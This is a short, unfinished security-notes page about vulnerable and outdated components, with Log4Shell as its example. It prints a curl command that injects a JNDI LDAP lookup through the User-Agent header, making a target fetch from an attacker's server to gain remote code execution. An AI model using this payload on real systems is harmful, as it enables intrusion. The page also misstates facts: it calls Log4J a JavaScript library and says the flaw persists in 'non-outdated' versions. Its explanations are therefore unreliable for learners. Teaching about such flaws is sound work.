Vulnerable and Outdated Components (WIP)

Highlights the dangers of using software libraries, frameworks, or components that contain known vulnerabilities or are outdated. When applications rely on these components, they inherit their security weaknesses, which could happen even on the server side or the client side.

Here is a typical example of this vulnerability:

The Log4Shell vulnerability is one of the most well-known examples of this. It is a vulnerability in the JavaScript library Log4J, which allowed RCE and information disclosure

#For example, a server is running using this component in its code
http://$url:8888/
#If we make a JNDI petition to the web server and redirect it to a JNDI server of our own, the connection will be caught, and the web server will process the content of the JNDI server
curl -A \${jndi:ldap://192.168.2.5:1234/a} http://TCMserver:8888/
#This can be leveraged by submitting exploits to the JNDI server, which will cause information disclosure and even RCE on the target server

This has been fixed in the latest versions of Log4J, but the vulnerability will remain in every application using a non-outdated version of the library

PreviousLocal File Inclusion (WIP)NextSoftware and Data Integrity Failures (WIP)

Last updated 6 months ago